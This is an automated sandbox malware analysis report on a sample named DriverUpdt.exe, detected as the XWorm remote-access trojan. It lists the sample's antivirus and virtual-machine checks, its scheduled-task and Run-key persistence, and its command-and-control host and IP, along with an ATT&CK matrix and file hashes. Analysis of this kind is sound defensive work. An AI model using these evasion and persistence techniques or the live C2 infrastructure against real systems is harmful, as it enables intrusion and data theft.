                      Source: DriverUpdt.exe, 00000000.00000002.3313153105.000000001BEA2000.00000004.00000020.00020000.00000000.sdmp, DriverUpdt.exe, 00000000.00000002.3313153105.000000001BEEC000.00000004.00000020.00020000.00000000.sdmp, DriverUpdt.exe, 00000000.00000002.3313153105.000000001BF04000.00000004.00000020.00020000.00000000.sdmp, DriverUpdt.exe, 00000000.00000002.3313153105.000000001BF3F000.00000004.00000020.00020000.00000000.sdmp, DriverUpdt.exe, 00000000.00000002.3272706936.0000000001415000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\DriverUpdt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: DriverUpdt.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DriverUpdt.exe.12ff1a78.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DriverUpdt.exe PID: 5520, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: DriverUpdt.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DriverUpdt.exe.12ff1a78.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DriverUpdt.exe PID: 5520, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Windows Management Instrumentation                      		1
                      Scheduled Task/Job                      		11
                      Process Injection                      		21
                      Masquerading                      		OS Credential Dumping551
                      Security Software Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		21
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		11
                      Disable or Modify Tools                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		1
                      DLL Side-Loading                      		21
                      Registry Run Keys / Startup Folder                      		161
                      Virtualization/Sandbox Evasion                      		Security Account Manager161
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading                      		11
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      System Network Configuration Discovery                      		SSHKeylogging12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing                      		DCSync33
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465719 Sample: DriverUpdt.exe Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 40 stewiegriffin-37537.portmap.host 2->40 42 ip-api.com 2->42 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus detection for URL or domain 2->54 56 13 other signatures 2->56 8 DriverUpdt.exe 15 6 2->8         started        13 DriverUpdt 2->13         started        15 svchost.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 44 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 8->44 46 stewiegriffin-37537.portmap.host 193.161.193.99, 37537, 49714, 49715 BITREE-ASRU Russian Federation 8->46 38 C:\Users\user\AppData\Roaming\DriverUpdt, PE32 8->38 dropped 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->60 62 Protects its processes via BreakOnTermination flag 8->62 64 Bypasses PowerShell execution policy 8->64 72 3 other signatures 8->72 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 66 Antivirus detection for dropped file 13->66 68 Multi AV Scanner detection for dropped file 13->68 70 Machine Learning detection for dropped file 13->70 48 127.0.0.1 unknown unknown 15->48 file6 signatures7 process8 signatures9 58 Loading BitLocker PowerShell Module 19->58 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DriverUpdt.exe84%ReversingLabsByteCode-MSIL.Trojan.AsyncRAT
                      DriverUpdt.exe100%AviraTR/Spy.Gen
                      DriverUpdt.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\DriverUpdt100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Roaming\DriverUpdt100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\DriverUpdt84%ReversingLabsByteCode-MSIL.Trojan.AsyncRAT

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                      https://ion=v4.5mConsumererv0%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/Prod/C:0%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/ProdV2.C:0%Avira URL Cloudsafe
                      http://crl.microsp0%Avira URL Cloudsafe
                      http://crl.mic0%Avira URL Cloudsafe
                      http://www.microsoom/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl0l0%Avira URL Cloudsafe
                      http://crl.micft.cMicRosof0%Avira URL Cloudsafe
                      http://crl.m0%Avira URL Cloudsafe
                      http://crl.micros0%Avira URL Cloudsafe
                      stewiegriffin-37537.portmap.host100%Avira URL Cloudmalware
                      http://www.microsoft.c0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ip-api.com
                      		208.95.112.1
                      		truetrue
                        		unknown
                        stewiegriffin-37537.portmap.host
                        		193.161.193.99
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          stewiegriffin-37537.portmap.hosttrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://ip-api.com/line/?fields=hostingfalse
                          • URL Reputation: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2119512647.0000029C6C39F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2209288191.00000135D96FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359742614.0000019A7675F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2102983893.0000029C5C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C98B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A66AA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.micpowershell.exe, 00000005.00000002.2227719144.00000135E1DF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.ver)svchost.exe, 00000012.00000002.3276702426.000001BA75A0F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000012.00000003.2732456791.000001BA75820000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://g.live.com/odclientsettings/Prod/C:edb.log.18.dr, qmgr.db.18.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.mpowershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.microsoom/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl0lpowershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ion=v4.5mConsumerervpowershell.exe, 00000002.00000002.2127592677.0000029C74A39000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.microsppowershell.exe, 0000000A.00000002.2583865294.0000014E38E00000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2102983893.0000029C5C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C98B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A66AA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2119512647.0000029C6C39F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2209288191.00000135D96FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359742614.0000019A7675F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.micft.cMicRosofpowershell.exe, 00000005.00000002.2227719144.00000135E1DF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2102983893.0000029C5C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C9691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A666F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E20711000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.microsoft.cpowershell.exe, 00000008.00000002.2385082051.0000019A7EEF8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDriverUpdt.exe, 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2102983893.0000029C5C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C9691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A666F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E20711000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://crl.microspowershell.exe, 00000005.00000002.2225891671.00000135E1C30000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUStrue
                          193.161.193.99
                          		stewiegriffin-37537.portmap.hostRussian Federation
                          		198134BITREE-ASRUtrue

                          Private

                          IP
                          127.0.0.1

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1465719
                          Start date and time:2024-07-02 00:32:53 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:21
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:DriverUpdt.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@21/25@2/3
                          EGA Information:
                          • Successful, ratio: 14.3%
                          HCA Information:
                          • Successful, ratio: 95%
                          • Number of executed functions: 76
                          • Number of non-executed functions: 5
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 184.28.90.27
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target DriverUpdt, PID 3008 because it is empty
                          • Execution Graph export aborted for target DriverUpdt, PID 4768 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 348 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 3924 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 5388 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7084 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: DriverUpdt.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          00:34:41Task SchedulerRun new task: DriverUpdt path: C:\Users\user\AppData\Roaming\DriverUpdt
                          00:34:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DriverUpdt C:\Users\user\AppData\Roaming\DriverUpdt
                          00:34:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DriverUpdt C:\Users\user\AppData\Roaming\DriverUpdt
                          00:34:59AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUpdt.lnk
                          18:33:46API Interceptor54x Sleep call for process: powershell.exe modified
                          18:34:44API Interceptor117106x Sleep call for process: DriverUpdt.exe modified
                          18:34:51API Interceptor2x Sleep call for process: svchost.exe modified
                          18:34:51API Interceptor2x Sleep call for process: OpenWith.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          208.95.112.1rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • ip-api.com/line/?fields=hosting
                          rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          8f5WsFcnTc.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          ZkqNrYh5cV.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • ip-api.com/line/?fields=hosting
                          v31TgVEtHi.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          yVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          001 Tech. Spec pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          doc -scan file.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          193.161.193.99Yq5Gp2g2vB.exeGet hashmaliciousRedLineBrowse
                          • okmaq-24505.portmap.host:24505/
                          JnBNepHH7K.exeGet hashmaliciousAsyncRAT RedLineBrowse
                          • exara32-64703.portmap.host:64703/
                          99SKW728vf.exeGet hashmaliciousRedLineBrowse
                          • lottie9nwtina-55339.portmap.host:55339/
                          amazoninvoiceAF0388d83739dee83479171dbcf.exeGet hashmaliciousRedLineBrowse
                          • tete2792-22120.portmap.host:22120//

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ip-api.comrinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          8f5WsFcnTc.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          ZkqNrYh5cV.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          v31TgVEtHi.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          yVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          001 Tech. Spec pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          doc -scan file.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          BITREE-ASRUpassword.exeGet hashmaliciousSugarDump, XWormBrowse
                          • 193.161.193.99
                          Project Al Ain (Hilli & Al Fou#U2019ah) Parks.vbeGet hashmaliciousStormKitty, XWormBrowse
                          • 193.161.193.99
                          9Ok3QP5FFV.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                          • 193.161.193.99
                          Client.exeGet hashmaliciousQuasarBrowse
                          • 193.161.193.99
                          siuu.exeGet hashmaliciousXWormBrowse
                          • 193.161.193.99
                          y0w04xGM45.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                          • 193.161.193.99
                          Se7CZnlXZZ.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                          • 193.161.193.99
                          fP4kybhBWi.exeGet hashmaliciousQuasarBrowse
                          • 193.161.193.99
                          zTuiDLpfjZ.exeGet hashmaliciousQuasarBrowse
                          • 193.161.193.99
                          bUmi.exeGet hashmaliciousNjratBrowse
                          • 193.161.193.99
                          TUT-ASUSrinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          8f5WsFcnTc.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          ZkqNrYh5cV.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 208.95.112.1
                          v31TgVEtHi.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          yVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          001 Tech. Spec pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1
                          doc -scan file.exeGet hashmaliciousAgentTeslaBrowse
                          • 208.95.112.1

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.8307301594197765
                          Encrypted:false
                          SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugZ:gJjJGtpTq2yv1AuNZRY3diu8iBVqFz
                          MD5:37EA4D4C095492AB5D976770EED6337E
                          SHA1:E30445DA165D07A0143C9F655CE92E1A39BFE94A
                          SHA-256:80DEBE333007A8E504D902BF9D0DD56C23EED5FE1896A70241530D8D0CEFEE8A
                          SHA-512:38774B18427E1F9CDA4CFFF52C7AF47EBBD1B10FE57898BFA028DC55F6FF88D4C053747856552A585C200636F02953FF455C8C3A5D3456720494E280A1A40981
                          Malicious:false
                          Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                          Download File
                          Process:C:\Windows\System32\svchost.exe
                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7693279d, page size 16384, DirtyShutdown, Windows version 10.0
                          Category:dropped
                          Size (bytes):1310720
                          Entropy (8bit):0.6586182627060748
                          Encrypted:false
                          SSDEEP:1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
                          MD5:440120B60582CFACAF0BD49823FF4094
                          SHA1:10332A44BCBB3CA8D019A3110F79CCF88F83A49A
